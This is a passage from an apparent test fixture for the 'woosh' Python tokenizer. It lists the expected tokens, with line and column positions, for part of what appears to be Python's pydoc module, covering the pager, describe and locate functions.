woosh.Token(woosh.NAME, 'stdout', 1670, 16, 1670, 22),
woosh.Token(woosh.OP, '.', 1670, 22, 1670, 23),
woosh.Token(woosh.NAME, 'write', 1670, 23, 1670, 28),
woosh.Token(woosh.OP, '(', 1670, 28, 1670, 29),
woosh.Token(woosh.STRING, "'\\n'", 1670, 29, 1670, 33),
woosh.Token(woosh.OP, '+', 1670, 34, 1670, 35),
woosh.Token(woosh.STRING, "'\\n'", 1670, 36, 1670, 40),
woosh.Token(woosh.OP, '.', 1670, 40, 1670, 41),
woosh.Token(woosh.NAME, 'join', 1670, 41, 1670, 45),
woosh.Token(woosh.OP, '(', 1670, 45, 1670, 46),
woosh.Token(woosh.NAME, 'lines', 1670, 46, 1670, 51),
woosh.Token(woosh.OP, '[', 1670, 51, 1670, 52),
woosh.Token(woosh.NAME, 'r', 1670, 52, 1670, 53),
woosh.Token(woosh.OP, ':', 1670, 53, 1670, 54),
woosh.Token(woosh.NAME, 'r', 1670, 54, 1670, 55),
woosh.Token(woosh.OP, '+', 1670, 55, 1670, 56),
woosh.Token(woosh.NAME, 'inc', 1670, 56, 1670, 59),
woosh.Token(woosh.OP, ']', 1670, 59, 1670, 60),
woosh.Token(woosh.OP, ')', 1670, 60, 1670, 61),
woosh.Token(woosh.OP, '+', 1670, 62, 1670, 63),
woosh.Token(woosh.STRING, "'\\n'", 1670, 64, 1670, 68),
woosh.Token(woosh.OP, ')', 1670, 68, 1670, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1670, 69, 1671, 0),
woosh.Token(woosh.NAME, 'r', 1671, 12, 1671, 13),
woosh.Token(woosh.OP, '=', 1671, 14, 1671, 15),
woosh.Token(woosh.NAME, 'r', 1671, 16, 1671, 17),
woosh.Token(woosh.OP, '+', 1671, 18, 1671, 19),
woosh.Token(woosh.NAME, 'inc', 1671, 20, 1671, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1671, 23, 1672, 0),
woosh.Token(woosh.DEDENT, ' ', 1673, 0, 1673, 4),
woosh.Token(woosh.DEDENT, '', 1673, 4, 1673, 4),
woosh.Token(woosh.NAME, 'finally', 1673, 4, 1673, 11),
woosh.Token(woosh.OP, ':', 1673, 11, 1673, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1673, 12, 1674, 0),
woosh.Token(woosh.INDENT, ' ', 1674, 0, 1674, 8),
woosh.Token(woosh.NAME, 'if', 1674, 8, 1674, 10),
woosh.Token(woosh.NAME, 'tty', 1674, 11, 1674, 14),
woosh.Token(woosh.OP, ':', 1674, 14, 1674, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1674, 15, 1675, 0),
woosh.Token(woosh.INDENT, ' ', 1675, 0, 1675, 12),
woosh.Token(woosh.NAME, 'tty', 1675, 12, 1675, 15),
woosh.Token(woosh.OP, '.', 1675, 15, 1675, 16),
woosh.Token(woosh.NAME, 'tcsetattr', 1675, 16, 1675, 25),
woosh.Token(woosh.OP, '(', 1675, 25, 1675, 26),
woosh.Token(woosh.NAME, 'fd', 1675, 26, 1675, 28),
woosh.Token(woosh.OP, ',', 1675, 28, 1675, 29),
woosh.Token(woosh.NAME, 'tty', 1675, 30, 1675, 33),
woosh.Token(woosh.OP, '.', 1675, 33, 1675, 34),
woosh.Token(woosh.NAME, 'TCSAFLUSH', 1675, 34, 1675, 43),
woosh.Token(woosh.OP, ',', 1675, 43, 1675, 44),
woosh.Token(woosh.NAME, 'old', 1675, 45, 1675, 48),
woosh.Token(woosh.OP, ')', 1675, 48, 1675, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1675, 49, 1676, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.NAME, 'def', 1677, 0, 1677, 3),
woosh.Token(woosh.NAME, 'plainpager', 1677, 4, 1677, 14),
woosh.Token(woosh.OP, '(', 1677, 14, 1677, 15),
woosh.Token(woosh.NAME, 'text', 1677, 15, 1677, 19),
woosh.Token(woosh.OP, ')', 1677, 19, 1677, 20),
woosh.Token(woosh.OP, ':', 1677, 20, 1677, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1677, 21, 1678, 0),
woosh.Token(woosh.INDENT, ' ', 1678, 0, 1678, 4),
woosh.Token(woosh.STRING, '"""Simply print unformatted text. This is the ultimate fallback."""', 1678, 4, 1678, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1678, 72, 1679, 0),
woosh.Token(woosh.NAME, 'sys', 1679, 4, 1679, 7),
woosh.Token(woosh.OP, '.', 1679, 7, 1679, 8),
woosh.Token(woosh.NAME, 'stdout', 1679, 8, 1679, 14),
woosh.Token(woosh.OP, '.', 1679, 14, 1679, 15),
woosh.Token(woosh.NAME, 'write', 1679, 15, 1679, 20),
woosh.Token(woosh.OP, '(', 1679, 20, 1679, 21),
woosh.Token(woosh.NAME, 'plain', 1679, 21, 1679, 26),
woosh.Token(woosh.OP, '(', 1679, 26, 1679, 27),
woosh.Token(woosh.NAME, '_escape_stdout', 1679, 27, 1679, 41),
woosh.Token(woosh.OP, '(', 1679, 41, 1679, 42),
woosh.Token(woosh.NAME, 'text', 1679, 42, 1679, 46),
woosh.Token(woosh.OP, ')', 1679, 46, 1679, 47),
woosh.Token(woosh.OP, ')', 1679, 47, 1679, 48),
woosh.Token(woosh.OP, ')', 1679, 48, 1679, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1679, 49, 1680, 0),
woosh.Token(woosh.DEDENT, '', 1681, 0, 1681, 0),
woosh.Token(woosh.NAME, 'def', 1681, 0, 1681, 3),
woosh.Token(woosh.NAME, 'describe', 1681, 4, 1681, 12),
woosh.Token(woosh.OP, '(', 1681, 12, 1681, 13),
woosh.Token(woosh.NAME, 'thing', 1681, 13, 1681, 18),
woosh.Token(woosh.OP, ')', 1681, 18, 1681, 19),
woosh.Token(woosh.OP, ':', 1681, 19, 1681, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1681, 20, 1682, 0),
woosh.Token(woosh.INDENT, ' ', 1682, 0, 1682, 4),
woosh.Token(woosh.STRING, '"""Produce a short description of the given thing."""', 1682, 4, 1682, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1682, 57, 1683, 0),
woosh.Token(woosh.NAME, 'if', 1683, 4, 1683, 6),
woosh.Token(woosh.NAME, 'inspect', 1683, 7, 1683, 14),
woosh.Token(woosh.OP, '.', 1683, 14, 1683, 15),
woosh.Token(woosh.NAME, 'ismodule', 1683, 15, 1683, 23),
woosh.Token(woosh.OP, '(', 1683, 23, 1683, 24),
woosh.Token(woosh.NAME, 'thing', 1683, 24, 1683, 29),
woosh.Token(woosh.OP, ')', 1683, 29, 1683, 30),
woosh.Token(woosh.OP, ':', 1683, 30, 1683, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1683, 31, 1684, 0),
woosh.Token(woosh.INDENT, ' ', 1684, 0, 1684, 8),
woosh.Token(woosh.NAME, 'if', 1684, 8, 1684, 10),
woosh.Token(woosh.NAME, 'thing', 1684, 11, 1684, 16),
woosh.Token(woosh.OP, '.', 1684, 16, 1684, 17),
woosh.Token(woosh.NAME, '__name__', 1684, 17, 1684, 25),
woosh.Token(woosh.NAME, 'in', 1684, 26, 1684, 28),
woosh.Token(woosh.NAME, 'sys', 1684, 29, 1684, 32),
woosh.Token(woosh.OP, '.', 1684, 32, 1684, 33),
woosh.Token(woosh.NAME, 'builtin_module_names', 1684, 33, 1684, 53),
woosh.Token(woosh.OP, ':', 1684, 53, 1684, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1684, 54, 1685, 0),
woosh.Token(woosh.INDENT, ' ', 1685, 0, 1685, 12),
woosh.Token(woosh.NAME, 'return', 1685, 12, 1685, 18),
woosh.Token(woosh.STRING, "'built-in module '", 1685, 19, 1685, 37),
woosh.Token(woosh.OP, '+', 1685, 38, 1685, 39),
woosh.Token(woosh.NAME, 'thing', 1685, 40, 1685, 45),
woosh.Token(woosh.OP, '.', 1685, 45, 1685, 46),
woosh.Token(woosh.NAME, '__name__', 1685, 46, 1685, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1685, 54, 1686, 0),
woosh.Token(woosh.DEDENT, ' ', 1686, 0, 1686, 8),
woosh.Token(woosh.NAME, 'if', 1686, 8, 1686, 10),
woosh.Token(woosh.NAME, 'hasattr', 1686, 11, 1686, 18),
woosh.Token(woosh.OP, '(', 1686, 18, 1686, 19),
woosh.Token(woosh.NAME, 'thing', 1686, 19, 1686, 24),
woosh.Token(woosh.OP, ',', 1686, 24, 1686, 25),
woosh.Token(woosh.STRING, "'__path__'", 1686, 26, 1686, 36),
woosh.Token(woosh.OP, ')', 1686, 36, 1686, 37),
woosh.Token(woosh.OP, ':', 1686, 37, 1686, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1686, 38, 1687, 0),
woosh.Token(woosh.INDENT, ' ', 1687, 0, 1687, 12),
woosh.Token(woosh.NAME, 'return', 1687, 12, 1687, 18),
woosh.Token(woosh.STRING, "'package '", 1687, 19, 1687, 29),
woosh.Token(woosh.OP, '+', 1687, 30, 1687, 31),
woosh.Token(woosh.NAME, 'thing', 1687, 32, 1687, 37),
woosh.Token(woosh.OP, '.', 1687, 37, 1687, 38),
woosh.Token(woosh.NAME, '__name__', 1687, 38, 1687, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1687, 46, 1688, 0),
woosh.Token(woosh.DEDENT, ' ', 1688, 0, 1688, 8),
woosh.Token(woosh.NAME, 'else', 1688, 8, 1688, 12),
woosh.Token(woosh.OP, ':', 1688, 12, 1688, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1688, 13, 1689, 0),
woosh.Token(woosh.INDENT, ' ', 1689, 0, 1689, 12),
woosh.Token(woosh.NAME, 'return', 1689, 12, 1689, 18),
woosh.Token(woosh.STRING, "'module '", 1689, 19, 1689, 28),
woosh.Token(woosh.OP, '+', 1689, 29, 1689, 30),
woosh.Token(woosh.NAME, 'thing', 1689, 31, 1689, 36),
woosh.Token(woosh.OP, '.', 1689, 36, 1689, 37),
woosh.Token(woosh.NAME, '__name__', 1689, 37, 1689, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1689, 45, 1690, 0),
woosh.Token(woosh.DEDENT, ' ', 1690, 0, 1690, 4),
woosh.Token(woosh.DEDENT, '', 1690, 4, 1690, 4),
woosh.Token(woosh.NAME, 'if', 1690, 4, 1690, 6),
woosh.Token(woosh.NAME, 'inspect', 1690, 7, 1690, 14),
woosh.Token(woosh.OP, '.', 1690, 14, 1690, 15),
woosh.Token(woosh.NAME, 'isbuiltin', 1690, 15, 1690, 24),
woosh.Token(woosh.OP, '(', 1690, 24, 1690, 25),
woosh.Token(woosh.NAME, 'thing', 1690, 25, 1690, 30),
woosh.Token(woosh.OP, ')', 1690, 30, 1690, 31),
woosh.Token(woosh.OP, ':', 1690, 31, 1690, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1690, 32, 1691, 0),
woosh.Token(woosh.INDENT, ' ', 1691, 0, 1691, 8),
woosh.Token(woosh.NAME, 'return', 1691, 8, 1691, 14),
woosh.Token(woosh.STRING, "'built-in function '", 1691, 15, 1691, 35),
woosh.Token(woosh.OP, '+', 1691, 36, 1691, 37),
woosh.Token(woosh.NAME, 'thing', 1691, 38, 1691, 43),
woosh.Token(woosh.OP, '.', 1691, 43, 1691, 44),
woosh.Token(woosh.NAME, '__name__', 1691, 44, 1691, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1691, 52, 1692, 0),
woosh.Token(woosh.DEDENT, ' ', 1692, 0, 1692, 4),
woosh.Token(woosh.NAME, 'if', 1692, 4, 1692, 6),
woosh.Token(woosh.NAME, 'inspect', 1692, 7, 1692, 14),
woosh.Token(woosh.OP, '.', 1692, 14, 1692, 15),
woosh.Token(woosh.NAME, 'isgetsetdescriptor', 1692, 15, 1692, 33),
woosh.Token(woosh.OP, '(', 1692, 33, 1692, 34),
woosh.Token(woosh.NAME, 'thing', 1692, 34, 1692, 39),
woosh.Token(woosh.OP, ')', 1692, 39, 1692, 40),
woosh.Token(woosh.OP, ':', 1692, 40, 1692, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1692, 41, 1693, 0),
woosh.Token(woosh.INDENT, ' ', 1693, 0, 1693, 8),
woosh.Token(woosh.NAME, 'return', 1693, 8, 1693, 14),
woosh.Token(woosh.STRING, "'getset descriptor %s.%s.%s'", 1693, 15, 1693, 43),
woosh.Token(woosh.OP, '%', 1693, 44, 1693, 45),
woosh.Token(woosh.OP, '(', 1693, 46, 1693, 47),
woosh.Token(woosh.NAME, 'thing', 1694, 12, 1694, 17),
woosh.Token(woosh.OP, '.', 1694, 17, 1694, 18),
woosh.Token(woosh.NAME, '__objclass__', 1694, 18, 1694, 30),
woosh.Token(woosh.OP, '.', 1694, 30, 1694, 31),
woosh.Token(woosh.NAME, '__module__', 1694, 31, 1694, 41),
woosh.Token(woosh.OP, ',', 1694, 41, 1694, 42),
woosh.Token(woosh.NAME, 'thing', 1694, 43, 1694, 48),
woosh.Token(woosh.OP, '.', 1694, 48, 1694, 49),
woosh.Token(woosh.NAME, '__objclass__', 1694, 49, 1694, 61),
woosh.Token(woosh.OP, '.', 1694, 61, 1694, 62),
woosh.Token(woosh.NAME, '__name__', 1694, 62, 1694, 70),
woosh.Token(woosh.OP, ',', 1694, 70, 1694, 71),
woosh.Token(woosh.NAME, 'thing', 1695, 12, 1695, 17),
woosh.Token(woosh.OP, '.', 1695, 17, 1695, 18),
woosh.Token(woosh.NAME, '__name__', 1695, 18, 1695, 26),
woosh.Token(woosh.OP, ')', 1695, 26, 1695, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1695, 27, 1696, 0),
woosh.Token(woosh.DEDENT, ' ', 1696, 0, 1696, 4),
woosh.Token(woosh.NAME, 'if', 1696, 4, 1696, 6),
woosh.Token(woosh.NAME, 'inspect', 1696, 7, 1696, 14),
woosh.Token(woosh.OP, '.', 1696, 14, 1696, 15),
woosh.Token(woosh.NAME, 'ismemberdescriptor', 1696, 15, 1696, 33),
woosh.Token(woosh.OP, '(', 1696, 33, 1696, 34),
woosh.Token(woosh.NAME, 'thing', 1696, 34, 1696, 39),
woosh.Token(woosh.OP, ')', 1696, 39, 1696, 40),
woosh.Token(woosh.OP, ':', 1696, 40, 1696, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1696, 41, 1697, 0),
woosh.Token(woosh.INDENT, ' ', 1697, 0, 1697, 8),
woosh.Token(woosh.NAME, 'return', 1697, 8, 1697, 14),
woosh.Token(woosh.STRING, "'member descriptor %s.%s.%s'", 1697, 15, 1697, 43),
woosh.Token(woosh.OP, '%', 1697, 44, 1697, 45),
woosh.Token(woosh.OP, '(', 1697, 46, 1697, 47),
woosh.Token(woosh.NAME, 'thing', 1698, 12, 1698, 17),
woosh.Token(woosh.OP, '.', 1698, 17, 1698, 18),
woosh.Token(woosh.NAME, '__objclass__', 1698, 18, 1698, 30),
woosh.Token(woosh.OP, '.', 1698, 30, 1698, 31),
woosh.Token(woosh.NAME, '__module__', 1698, 31, 1698, 41),
woosh.Token(woosh.OP, ',', 1698, 41, 1698, 42),
woosh.Token(woosh.NAME, 'thing', 1698, 43, 1698, 48),
woosh.Token(woosh.OP, '.', 1698, 48, 1698, 49),
woosh.Token(woosh.NAME, '__objclass__', 1698, 49, 1698, 61),
woosh.Token(woosh.OP, '.', 1698, 61, 1698, 62),
woosh.Token(woosh.NAME, '__name__', 1698, 62, 1698, 70),
woosh.Token(woosh.OP, ',', 1698, 70, 1698, 71),
woosh.Token(woosh.NAME, 'thing', 1699, 12, 1699, 17),
woosh.Token(woosh.OP, '.', 1699, 17, 1699, 18),
woosh.Token(woosh.NAME, '__name__', 1699, 18, 1699, 26),
woosh.Token(woosh.OP, ')', 1699, 26, 1699, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1699, 27, 1700, 0),
woosh.Token(woosh.DEDENT, ' ', 1700, 0, 1700, 4),
woosh.Token(woosh.NAME, 'if', 1700, 4, 1700, 6),
woosh.Token(woosh.NAME, 'inspect', 1700, 7, 1700, 14),
woosh.Token(woosh.OP, '.', 1700, 14, 1700, 15),
woosh.Token(woosh.NAME, 'isclass', 1700, 15, 1700, 22),
woosh.Token(woosh.OP, '(', 1700, 22, 1700, 23),
woosh.Token(woosh.NAME, 'thing', 1700, 23, 1700, 28),
woosh.Token(woosh.OP, ')', 1700, 28, 1700, 29),
woosh.Token(woosh.OP, ':', 1700, 29, 1700, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1700, 30, 1701, 0),
woosh.Token(woosh.INDENT, ' ', 1701, 0, 1701, 8),
woosh.Token(woosh.NAME, 'return', 1701, 8, 1701, 14),
woosh.Token(woosh.STRING, "'class '", 1701, 15, 1701, 23),
woosh.Token(woosh.OP, '+', 1701, 24, 1701, 25),
woosh.Token(woosh.NAME, 'thing', 1701, 26, 1701, 31),
woosh.Token(woosh.OP, '.', 1701, 31, 1701, 32),
woosh.Token(woosh.NAME, '__name__', 1701, 32, 1701, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1701, 40, 1702, 0),
woosh.Token(woosh.DEDENT, ' ', 1702, 0, 1702, 4),
woosh.Token(woosh.NAME, 'if', 1702, 4, 1702, 6),
woosh.Token(woosh.NAME, 'inspect', 1702, 7, 1702, 14),
woosh.Token(woosh.OP, '.', 1702, 14, 1702, 15),
woosh.Token(woosh.NAME, 'isfunction', 1702, 15, 1702, 25),
woosh.Token(woosh.OP, '(', 1702, 25, 1702, 26),
woosh.Token(woosh.NAME, 'thing', 1702, 26, 1702, 31),
woosh.Token(woosh.OP, ')', 1702, 31, 1702, 32),
woosh.Token(woosh.OP, ':', 1702, 32, 1702, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1702, 33, 1703, 0),
woosh.Token(woosh.INDENT, ' ', 1703, 0, 1703, 8),
woosh.Token(woosh.NAME, 'return', 1703, 8, 1703, 14),
woosh.Token(woosh.STRING, "'function '", 1703, 15, 1703, 26),
woosh.Token(woosh.OP, '+', 1703, 27, 1703, 28),
woosh.Token(woosh.NAME, 'thing', 1703, 29, 1703, 34),
woosh.Token(woosh.OP, '.', 1703, 34, 1703, 35),
woosh.Token(woosh.NAME, '__name__', 1703, 35, 1703, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1703, 43, 1704, 0),
woosh.Token(woosh.DEDENT, ' ', 1704, 0, 1704, 4),
woosh.Token(woosh.NAME, 'if', 1704, 4, 1704, 6),
woosh.Token(woosh.NAME, 'inspect', 1704, 7, 1704, 14),
woosh.Token(woosh.OP, '.', 1704, 14, 1704, 15),
woosh.Token(woosh.NAME, 'ismethod', 1704, 15, 1704, 23),
woosh.Token(woosh.OP, '(', 1704, 23, 1704, 24),
woosh.Token(woosh.NAME, 'thing', 1704, 24, 1704, 29),
woosh.Token(woosh.OP, ')', 1704, 29, 1704, 30),
woosh.Token(woosh.OP, ':', 1704, 30, 1704, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1704, 31, 1705, 0),
woosh.Token(woosh.INDENT, ' ', 1705, 0, 1705, 8),
woosh.Token(woosh.NAME, 'return', 1705, 8, 1705, 14),
woosh.Token(woosh.STRING, "'method '", 1705, 15, 1705, 24),
woosh.Token(woosh.OP, '+', 1705, 25, 1705, 26),
woosh.Token(woosh.NAME, 'thing', 1705, 27, 1705, 32),
woosh.Token(woosh.OP, '.', 1705, 32, 1705, 33),
woosh.Token(woosh.NAME, '__name__', 1705, 33, 1705, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1705, 41, 1706, 0),
woosh.Token(woosh.DEDENT, ' ', 1706, 0, 1706, 4),
woosh.Token(woosh.NAME, 'return', 1706, 4, 1706, 10),
woosh.Token(woosh.NAME, 'type', 1706, 11, 1706, 15),
woosh.Token(woosh.OP, '(', 1706, 15, 1706, 16),
woosh.Token(woosh.NAME, 'thing', 1706, 16, 1706, 21),
woosh.Token(woosh.OP, ')', 1706, 21, 1706, 22),
woosh.Token(woosh.OP, '.', 1706, 22, 1706, 23),
woosh.Token(woosh.NAME, '__name__', 1706, 23, 1706, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1706, 31, 1707, 0),
woosh.Token(woosh.DEDENT, '', 1708, 0, 1708, 0),
woosh.Token(woosh.NAME, 'def', 1708, 0, 1708, 3),
woosh.Token(woosh.NAME, 'locate', 1708, 4, 1708, 10),
woosh.Token(woosh.OP, '(', 1708, 10, 1708, 11),
woosh.Token(woosh.NAME, 'path', 1708, 11, 1708, 15),
woosh.Token(woosh.OP, ',', 1708, 15, 1708, 16),
woosh.Token(woosh.NAME, 'forceload', 1708, 17, 1708, 26),
woosh.Token(woosh.OP, '=', 1708, 26, 1708, 27),
woosh.Token(woosh.NUMBER, '0', 1708, 27, 1708, 28),
woosh.Token(woosh.OP, ')', 1708, 28, 1708, 29),
woosh.Token(woosh.OP, ':', 1708, 29, 1708, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1708, 30, 1709, 0),
woosh.Token(woosh.INDENT, ' ', 1709, 0, 1709, 4),
woosh.Token(woosh.STRING, '"""Locate an object by name or dotted path, importing as necessary."""', 1709, 4, 1709, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1709, 74, 1710, 0),
woosh.Token(woosh.NAME, 'parts', 1710, 4, 1710, 9),
woosh.Token(woosh.OP, '=', 1710, 10, 1710, 11),
woosh.Token(woosh.OP, '[', 1710, 12, 1710, 13),
woosh.Token(woosh.NAME, 'part', 1710, 13, 1710, 17),
woosh.Token(woosh.NAME, 'for', 1710, 18, 1710, 21),
woosh.Token(woosh.NAME, 'part', 1710, 22, 1710, 26),
woosh.Token(woosh.NAME, 'in', 1710, 27, 1710, 29),
woosh.Token(woosh.NAME, 'path', 1710, 30, 1710, 34),
woosh.Token(woosh.OP, '.', 1710, 34, 1710, 35),
woosh.Token(woosh.NAME, 'split', 1710, 35, 1710, 40),
woosh.Token(woosh.OP, '(', 1710, 40, 1710, 41),
woosh.Token(woosh.STRING, "'.'", 1710, 41, 1710, 44),
woosh.Token(woosh.OP, ')', 1710, 44, 1710, 45),
woosh.Token(woosh.NAME, 'if', 1710, 46, 1710, 48),
woosh.Token(woosh.NAME, 'part', 1710, 49, 1710, 53),
woosh.Token(woosh.OP, ']', 1710, 53, 1710, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1710, 54, 1711, 0),
woosh.Token(woosh.NAME, 'module', 1711, 4, 1711, 10),
woosh.Token(woosh.OP, ',', 1711, 10, 1711, 11),
woosh.Token(woosh.NAME, 'n', 1711, 12, 1711, 13),
woosh.Token(woosh.OP, '=', 1711, 14, 1711, 15),
woosh.Token(woosh.NAME, 'None', 1711, 16, 1711, 20),
woosh.Token(woosh.OP, ',', 1711, 20, 1711, 21),
woosh.Token(woosh.NUMBER, '0', 1711, 22, 1711, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1711, 23, 1712, 0),
woosh.Token(woosh.NAME, 'while', 1712, 4, 1712, 9),
woosh.Token(woosh.NAME, 'n', 1712, 10, 1712, 11),
woosh.Token(woosh.OP, '<', 1712, 12, 1712, 13),
woosh.Token(woosh.NAME, 'len', 1712, 14, 1712, 17),
woosh.Token(woosh.OP, '(', 1712, 17, 1712, 18),
woosh.Token(woosh.NAME, 'parts', 1712, 18, 1712, 23),
woosh.Token(woosh.OP, ')', 1712, 23, 1712, 24),
woosh.Token(woosh.OP, ':', 1712, 24, 1712, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1712, 25, 1713, 0),
woosh.Token(woosh.INDENT, ' ', 1713, 0, 1713, 8),
woosh.Token(woosh.NAME, 'nextmodule', 1713, 8, 1713, 18),
woosh.Token(woosh.OP, '=', 1713, 19, 1713, 20),
woosh.Token(woosh.NAME, 'safeimport', 1713, 21, 1713, 31),
woosh.Token(woosh.OP, '(', 1713, 31, 1713, 32),
woosh.Token(woosh.STRING, "'.'", 1713, 32, 1713, 35),
woosh.Token(woosh.OP, '.', 1713, 35, 1713, 36),
woosh.Token(woosh.NAME, 'join', 1713, 36, 1713, 40),
woosh.Token(woosh.OP, '(', 1713, 40, 1713, 41),
woosh.Token(woosh.NAME, 'parts', 1713, 41, 1713, 46),
woosh.Token(woosh.OP, '[', 1713, 46, 1713, 47),
woosh.Token(woosh.OP, ':', 1713, 47, 1713, 48),
woosh.Token(woosh.NAME, 'n', 1713, 48, 1713, 49),
woosh.Token(woosh.OP, '+', 1713, 49, 1713, 50),
woosh.Token(woosh.NUMBER, '1', 1713, 50, 1713, 51),
woosh.Token(woosh.OP, ']', 1713, 51, 1713, 52),
woosh.Token(woosh.OP, ')', 1713, 52, 1713, 53),
woosh.Token(woosh.OP, ',', 1713, 53, 1713, 54),
woosh.Token(woosh.NAME, 'forceload', 1713, 55, 1713, 64),
woosh.Token(woosh.OP, ')', 1713, 64, 1713, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1713, 65, 1714, 0),
woosh.Token(woosh.NAME, 'if', 1714, 8, 1714, 10),
woosh.Token(woosh.NAME, 'nextmodule', 1714, 11, 1714, 21),
woosh.Token(woosh.OP, ':', 1714, 21, 1714, 22),
woosh.Token(woosh.NAME, 'module', 1714, 23, 1714, 29),
woosh.Token(woosh.OP, ',', 1714, 29, 1714, 30),
woosh.Token(woosh.NAME, 'n', 1714, 31, 1714, 32),
woosh.Token(woosh.OP, '=', 1714, 33, 1714, 34),
woosh.Token(woosh.NAME, 'nextmodule', 1714, 35, 1714, 45),
woosh.Token(woosh.OP, ',', 1714, 45, 1714, 46),
woosh.Token(woosh.NAME, 'n', 1714, 47, 1714, 48),
woosh.Token(woosh.OP, '+', 1714, 49, 1714, 50),
woosh.Token(woosh.NUMBER, '1', 1714, 51, 1714, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1714, 52, 1715, 0),
woosh.Token(woosh.NAME, 'else', 1715, 8, 1715, 12),
woosh.Token(woosh.OP, ':', 1715, 12, 1715, 13),
woosh.Token(woosh.NAME, 'break', 1715, 14, 1715, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1715, 19, 1716, 0),
woosh.Token(woosh.DEDENT, ' ', 1716, 0, 1716, 4),
woosh.Token(woosh.NAME, 'if', 1716, 4, 1716, 6),
woosh.Token(woosh.NAME, 'module', 1716, 7, 1716, 13),
woosh.Token(woosh.OP, ':', 1716, 13, 1716, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 1716, 14, 1717, 0),
woosh.Token(woosh.INDENT, ' ', 1717, 0, 1717, 8),
woosh.Token(woosh.NAME, 'object', 1717, 8, 1717, 14),
woosh.Token(woosh.OP, '=', 1717, 15, 1717, 16),
woosh.Token(woosh.NAME, 'module', 1717, 17, 1717, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1717, 23, 1718, 0),
woosh.Token(woosh.DEDENT, ' ', 1718, 0, 1718, 4),
woosh.Token(woosh.NAME, 'else', 1718, 4, 1718, 8),
woosh.Token(woosh.OP, ':', 1718, 8, 1718, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1718, 9, 1719, 0),
woosh.Token(woosh.INDENT, ' ', 1719, 0, 1719, 8),
woosh.Token(woosh.NAME, 'object', 1719, 8, 1719, 14),
woosh.Token(woosh.OP, '=', 1719, 15, 1719, 16),
woosh.Token(woosh.NAME, 'builtins', 1719, 17, 1719, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1719, 25, 1720, 0),
woosh.Token(woosh.DEDENT, ' ', 1720, 0, 1720, 4),
woosh.Token(woosh.NAME, 'for', 1720, 4, 1720, 7),
woosh.Token(woosh.NAME, 'part', 1720, 8, 1720, 12),
woosh.Token(woosh.NAME, 'in', 1720, 13, 1720, 15),
woosh.Token(woosh.NAME, 'parts', 1720, 16, 1720, 21),
woosh.Token(woosh.OP, '[', 1720, 21, 1720, 22),
woosh.Token(woosh.NAME, 'n', 1720, 22, 1720, 23),
woosh.Token(woosh.OP, ':', 1720, 23, 1720, 24),
woosh.Token(woosh.OP, ']', 1720, 24, 1720, 25),
woosh.Token(woosh.OP, ':', 1720, 25, 1720, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1720, 26, 1721, 0),
woosh.Token(woosh.INDENT, ' ', 1721, 0, 1721, 8),
woosh.Token(woosh.NAME, 'try', 1721, 8, 1721, 11),
woosh.Token(woosh.OP, ':', 1721, 11, 1721, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1721, 12, 1722, 0),
woosh.Token(woosh.INDENT, ' ', 1722, 0, 1722, 12),
woosh.Token(woosh.NAME, 'object', 1722, 12, 1722, 18),
woosh.Token(woosh.OP, '=', 1722, 19, 1722, 20),
woosh.Token(woosh.NAME, 'getattr', 1722, 21, 1722, 28),
woosh.Token(woosh.OP, '(', 1722, 28, 1722, 29),
woosh.Token(woosh.NAME, 'object', 1722, 29, 1722, 35),
woosh.Token(woosh.OP, ',', 1722, 35, 1722, 36),
woosh.Token(woosh.NAME, 'part', 1722, 37, 1722, 41),
woosh.Token(woosh.OP, ')', 1722, 41, 1722, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1722, 42, 1723, 0),
woosh.Token(woosh.DEDENT, ' ', 1723, 0, 1723, 8),
woosh.Token(woosh.NAME, 'except', 1723, 8, 1723, 14),
woosh.Token(woosh.NAME, 'AttributeError', 1723, 15, 1723, 29),
woosh.Token(woosh.OP, ':', 1723, 29, 1723, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1723, 30, 1724, 0),
woosh.Token(woosh.INDENT, ' ', 1724, 0, 1724, 12),
